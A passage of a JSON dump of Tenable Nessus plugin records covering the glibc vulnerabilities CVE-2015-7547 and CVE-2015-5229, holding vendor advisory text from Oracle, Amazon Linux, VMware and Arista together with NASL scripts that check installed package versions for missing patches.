(rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"glibc-headers-2.17-106.el7_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"glibc-headers-2.17-106.el7_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-static-2.17-106.el7_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"glibc-utils-2.17-106.el7_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"glibc-utils-2.17-106.el7_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"nscd-2.17-106.el7_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"nscd-2.17-106.el7_2.4\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:50:32", "description": "From Red Hat Security Advisory 2016:0176 :\n\nUpdated glibc packages that fix two security issues and two bugs are\nnow available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nname service cache daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA stack-based buffer overflow was found in the way the libresolv\nlibrary performed dual A/AAAA DNS queries. A remote attacker could\ncreate a specially crafted DNS response which could cause libresolv to\ncrash or, potentially, execute code with the permissions of the user\nrunning the library. Note: this issue is only exposed when libresolv\nis called from the nss_dns NSS service module. (CVE-2015-7547)\n\nIt was discovered that the calloc implementation in glibc could return\nmemory areas which contain non-zero bytes. This could result in\nunexpected application behavior such as hangs or crashes.\n(CVE-2015-5229)\n\nThe CVE-2015-7547 issue was discovered by the Google Security Team and\nRed Hat. Red Hat would like to thank Jeff Layton for reporting the\nCVE-2015-5229 issue.\n\nThis update also fixes the following bugs :\n\n* The existing implementation of the 'free' function causes all memory\npools beyond the first to return freed memory directly to the\noperating system as quickly as possible. This can result in\nperformance degradation when the rate of free calls is very high. The\nfirst memory pool (the main pool) does provide a method to rate limit\nthe returns via M_TRIM_THRESHOLD, but this method is not available to\nsubsequent memory pools.\n\nWith this update, the M_TRIM_THRESHOLD method is extended to apply to\nall memory pools, which improves performance for threads with very\nhigh amounts of free calls and limits the number of 'madvise' system\ncalls. The change also increases the total transient memory usage by\nprocesses because the trim threshold must be reached before memory can\nbe freed.\n\nTo return to the previous behavior, you can either set\nM_TRIM_THRESHOLD using the 'mallopt' function, or set the\nMALLOC_TRIM_THRESHOLD environment variable to 0. (BZ#1298930)\n\n* On the little-endian variant of 64-bit IBM Power Systems (ppc64le),\na bug in the dynamic loader could cause applications compiled with\nprofiling enabled to fail to start with the error 'monstartup: out of\nmemory'. The bug has been corrected and applications compiled for\nprofiling now start correctly. (BZ#1298956)\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues.", "edition": 32, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-17T00:00:00", "title": "Oracle Linux 7 : glibc (ELSA-2016-0176)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5229", "CVE-2015-7547"], "modified": "2016-02-17T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:nscd", "p-cpe:/a:oracle:linux:glibc-devel", "p-cpe:/a:oracle:linux:glibc-utils", "p-cpe:/a:oracle:linux:glibc-static", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:glibc-headers", "p-cpe:/a:oracle:linux:glibc-common", "p-cpe:/a:oracle:linux:glibc"], "id": "ORACLELINUX_ELSA-2016-0176.NASL", "href": "https://www.tenable.com/plugins/nessus/88777", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2016:0176 and \n# Oracle Linux Security Advisory ELSA-2016-0176 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88777);\n script_version(\"2.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-5229\", \"CVE-2015-7547\");\n script_xref(name:\"RHSA\", value:\"2016:0176\");\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n\n script_name(english:\"Oracle Linux 7 : glibc (ELSA-2016-0176)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2016:0176 :\n\nUpdated glibc packages that fix two security issues and two bugs are\nnow available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nname service cache daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA stack-based buffer overflow was found in the way the libresolv\nlibrary performed dual A/AAAA DNS queries. A remote attacker could\ncreate a specially crafted DNS response which could cause libresolv to\ncrash or, potentially, execute code with the permissions of the user\nrunning the library. Note: this issue is only exposed when libresolv\nis called from the nss_dns NSS service module. (CVE-2015-7547)\n\nIt was discovered that the calloc implementation in glibc could return\nmemory areas which contain non-zero bytes. This could result in\nunexpected application behavior such as hangs or crashes.\n(CVE-2015-5229)\n\nThe CVE-2015-7547 issue was discovered by the Google Security Team and\nRed Hat. Red Hat would like to thank Jeff Layton for reporting the\nCVE-2015-5229 issue.\n\nThis update also fixes the following bugs :\n\n* The existing implementation of the 'free' function causes all memory\npools beyond the first to return freed memory directly to the\noperating system as quickly as possible. This can result in\nperformance degradation when the rate of free calls is very high. The\nfirst memory pool (the main pool) does provide a method to rate limit\nthe returns via M_TRIM_THRESHOLD, but this method is not available to\nsubsequent memory pools.\n\nWith this update, the M_TRIM_THRESHOLD method is extended to apply to\nall memory pools, which improves performance for threads with very\nhigh amounts of free calls and limits the number of 'madvise' system\ncalls. The change also increases the total transient memory usage by\nprocesses because the trim threshold must be reached before memory can\nbe freed.\n\nTo return to the previous behavior, you can either set\nM_TRIM_THRESHOLD using the 'mallopt' function, or set the\nMALLOC_TRIM_THRESHOLD environment variable to 0. (BZ#1298930)\n\n* On the little-endian variant of 64-bit IBM Power Systems (ppc64le),\na bug in the dynamic loader could cause applications compiled with\nprofiling enabled to fail to start with the error 'monstartup: out of\nmemory'. The bug has been corrected and applications compiled for\nprofiling now start correctly. (BZ#1298956)\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-February/005784.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/17\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-2.17-106.0.1.el7_2.4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-common-2.17-106.0.1.el7_2.4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-devel-2.17-106.0.1.el7_2.4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-headers-2.17-106.0.1.el7_2.4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-static-2.17-106.0.1.el7_2.4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-utils-2.17-106.0.1.el7_2.4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"nscd-2.17-106.0.1.el7_2.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-static / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-01T01:23:48", "description": "It was discovered that the calloc implementation in glibc could return\nmemory areas which contain non-zero bytes. This could result in\nunexpected application behavior such as hangs or crashes.", "edition": 27, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-03-11T00:00:00", "title": "Amazon Linux AMI : glibc (ALAS-2016-660)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5229"], "modified": "2021-04-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:glibc-debuginfo", "p-cpe:/a:amazon:linux:glibc-devel", "p-cpe:/a:amazon:linux:glibc-utils", "p-cpe:/a:amazon:linux:nscd", "p-cpe:/a:amazon:linux:glibc", "p-cpe:/a:amazon:linux:glibc-common", "p-cpe:/a:amazon:linux:glibc-debuginfo-common", "p-cpe:/a:amazon:linux:glibc-static", "cpe:/o:amazon:linux", "p-cpe:/a:amazon:linux:glibc-headers"], "id": "ALA_ALAS-2016-660.NASL", "href": "https://www.tenable.com/plugins/nessus/89841", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2016-660.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(89841);\n script_version(\"2.4\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2015-5229\");\n script_xref(name:\"ALAS\", value:\"2016-660\");\n\n script_name(english:\"Amazon Linux AMI : glibc (ALAS-2016-660)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the calloc implementation in glibc could return\nmemory areas which contain non-zero bytes. This could result in\nunexpected application behavior such as hangs or crashes.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2016-660.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update glibc' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"glibc-2.17-106.167.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-common-2.17-106.167.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-2.17-106.167.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-common-2.17-106.167.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-devel-2.17-106.167.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-headers-2.17-106.167.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-static-2.17-106.167.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-utils-2.17-106.167.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"nscd-2.17-106.167.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-07T15:21:39", "description": "a. glibc update for multiple products.\n\n The glibc library has been updated in multiple products to resolve \n a stack-based buffer overflow present in the glibc getaddrinfo function.\n \n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the identifier CVE-2015-7547.\n\n VMware products have been grouped into the following four\n categories :\n \n I) ESXi and ESX Hypervisor\n Versions of ESXi and ESX prior to 5.5 are not affected because\n they do not ship with a vulnerable version of glibc.\n ESXi 5.5 and ESXi 6.0 ship with a vulnerable version of glibc and\n are affected. \n See table 1 for remediation for ESXi 5.5 and ESXi 6.0.\n \n II) Windows-based products\n Windows-based products, including all versions of vCenter Server \n running on Windows, are not affected.\n\n III) VMware virtual appliances\n VMware virtual appliances ship with a vulnerable version of glibc\n and are affected. \n See table 2 for remediation for appliances.\n \n IV) Products that run on Linux\n VMware products that run on Linux (excluding virtual appliances)\n might use a vulnerable version of glibc as part of the base\n operating system. If the operating system has a vulnerable version\n of glibc, VMware recommends that customers contact their operating\n system vendor for resolution. \n \n WORKAROUND\n\n Workarounds are available for several virtual appliances. These are \n documented in VMware KB article 2144032.\n\n RECOMMENDATIONS\n\n VMware recommends customers evaluate and deploy patches for\n affected products in Table 1 and 2 below as these patches become\n available. In case patches are not available, customers are\n advised to deploy the workaround.\n\n Column 4 of the following tables lists the action required to\n remediate the vulnerability in each release, if a solution is\n available.\n\n Table 1 - ESXi\n ==============", "edition": 31, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-25T00:00:00", "title": "VMSA-2016-0002 : VMware product updates address a critical glibc security vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7547"], "modified": "2016-02-25T00:00:00", "cpe": ["cpe:/o:vmware:esxi:6.0", "cpe:/o:vmware:esxi:5.5"], "id": "VMWARE_VMSA-2016-0002.NASL", "href": "https://www.tenable.com/plugins/nessus/88954", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from VMware Security Advisory 2016-0002. \n# The text itself is copyright (C) VMware Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88954);\n script_version(\"2.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-7547\");\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n script_xref(name:\"VMSA\", value:\"2016-0002\");\n\n script_name(english:\"VMSA-2016-0002 : VMware product updates address a critical glibc security vulnerability\");\n script_summary(english:\"Checks esxupdate output for the patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote VMware ESXi host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"a. glibc update for multiple products.\n\n The glibc library has been updated in multiple products to resolve \n a stack-based buffer overflow present in the glibc getaddrinfo function.\n \n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the identifier CVE-2015-7547.\n\n VMware products have been grouped into the following four\n categories :\n \n I) ESXi and ESX Hypervisor\n Versions of ESXi and ESX prior to 5.5 are not affected because\n they do not ship with a vulnerable version of glibc.\n ESXi 5.5 and ESXi 6.0 ship with a vulnerable version of glibc and\n are affected. \n See table 1 for remediation for ESXi 5.5 and ESXi 6.0.\n \n II) Windows-based products\n Windows-based products, including all versions of vCenter Server \n running on Windows, are not affected.\n\n III) VMware virtual appliances\n VMware virtual appliances ship with a vulnerable version of glibc\n and are affected. \n See table 2 for remediation for appliances.\n \n IV) Products that run on Linux\n VMware products that run on Linux (excluding virtual appliances)\n might use a vulnerable version of glibc as part of the base\n operating system. If the operating system has a vulnerable version\n of glibc, VMware recommends that customers contact their operating\n system vendor for resolution. \n \n WORKAROUND\n\n Workarounds are available for several virtual appliances. These are \n documented in VMware KB article 2144032.\n\n RECOMMENDATIONS\n\n VMware recommends customers evaluate and deploy patches for\n affected products in Table 1 and 2 below as these patches become\n available. In case patches are not available, customers are\n advised to deploy the workaround.\n\n Column 4 of the following tables lists the action required to\n remediate the vulnerability in each release, if a solution is\n available.\n\n Table 1 - ESXi\n ==============\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.vmware.com/pipermail/security-announce/2016/000320.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply the missing patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:5.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/22\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"VMware ESX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/VMware/release\", \"Host/VMware/version\");\n script_require_ports(\"Host/VMware/esxupdate\", \"Host/VMware/esxcli_software_vibs\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"vmware_esx_packages.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/VMware/release\")) audit(AUDIT_OS_NOT, \"VMware ESX / ESXi\");\nif (\n !get_kb_item(\"Host/VMware/esxcli_software_vibs\") &&\n !get_kb_item(\"Host/VMware/esxupdate\")\n) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ninit_esx_check(date:\"2016-02-22\");\nflag = 0;\n\n\nif (esx_check(ver:\"ESXi 5.5\", vib:\"VMware:esx-base:5.5.0-3.84.3568722\")) flag++;\n\nif (esx_check(ver:\"ESXi 6.0\", vib:\"VMware:esx-base:6.0.0-1.29.3568940\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:esx_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T22:48:45", "description": "The version of Arista Networks EOS running on the remote device is\naffected by multiple stack-based buffer overflow conditions in the GNU\nlibresolv library, specifically within the send_dg() and send_vc()\nfunctions, when handling DNS responses that trigger a call to the\ngetaddrinfo() function with the AF_UNSPEC or AF_INET6 address family.\nAn unauthenticated, remote attacker can exploit these issues, via a\nspecially crafted DNS response, to cause a denial of service condition\nor the execution of arbitrary code.", "edition": 8, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-02-28T00:00:00", "title": "Arista Networks EOS libresolv Overflow RCE (SA0017)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7547"], "modified": "2018-02-28T00:00:00", "cpe": ["cpe:/o:arista:eos"], "id": "ARISTA_EOS_SA0017.NASL", "href": "https://www.tenable.com/plugins/nessus/107059", "sourceData": "#TRUSTED 5c03b7cda25c6e50903ea18829757131c08b414448f381ee3fa9bf1389f936a1aa728d94fe5ab48283f4ca3c462f77e0929a6d7bfa4408aca5d4d0d80d615230527156c6d0630c4241c1bec0b20efe7ce5a6558d87049782cb2c51dc4702b416290d328a8b5132b6e7c0f32f6b564ba8a1366272600c0e35138817d8542b5e5c829c58d39176fa67b248701ac2f45ff0d2068e3ebaec4e57ba84ad80b9eac4e18fa480e12717d00a79efcf4cd5cbd57a6b8a6622b7356c804dd1e964bd7818e84cab854d4e33d9676bc08aa9cb23a895c23b8b646efdf91b187653718c46a918326f0cc4057b86c86f02b766c03bf9292e0dff81ce741764923760b61d8d1b3d3b8df402d72e8e35cfd35f9007b73cdc2c263bd50eda2f77d267d3714c2c7e60b1fd041ca4630840e6ca350540da0fb02b90528bb54cef55baef3ae27b64d26f5a127c405938ed5c41cafe230e1bdd2eaf804983c9d6b9cbaa8accf4cbdc94f776790b9ebb49e5caeb016f6dd23d7211c828d7f90d42ab0ed6f4bc0b58ef97d501c18ae411f2daea8aabe35d6be4a50622bdefa7849c1fa4267b8bed5babcc498e8eb5726bb7ef8586f93d89f64fec713fb0c7b6a5654b89daa92f063b830f1188baa547b53a0360f3f5e772c3405f5bc01ccdbb207c2cdca5c639e13525bc6bb4366676c0ef9b6281bac83ee5411ae4da842e7925106279d81835e661dd46f1\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107059);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/13\");\n\n script_cve_id(\"CVE-2015-7547\");\n script_bugtraq_id(83265);\n script_xref(name:\"CERT\", value:\"457759\");\n script_xref(name:\"EDB-ID\", value:\"39454\");\n script_xref(name:\"EDB-ID\", value:\"40339\");\n\n script_name(english:\"Arista Networks EOS libresolv Overflow RCE (SA0017)\");\n script_summary(english:\"Checks the Arista Networks EOS version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Arista Networks EOS running on the remote device is\naffected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Arista Networks EOS running on the remote device is\naffected by multiple stack-based buffer overflow conditions in the GNU\nlibresolv library, specifically within the send_dg() and send_vc()\nfunctions, when handling DNS responses that trigger a call to the\ngetaddrinfo() function with the AF_UNSPEC or AF_INET6 address family.\nAn unauthenticated, remote attacker can exploit these issues, via a\nspecially crafted DNS response, to cause a denial of 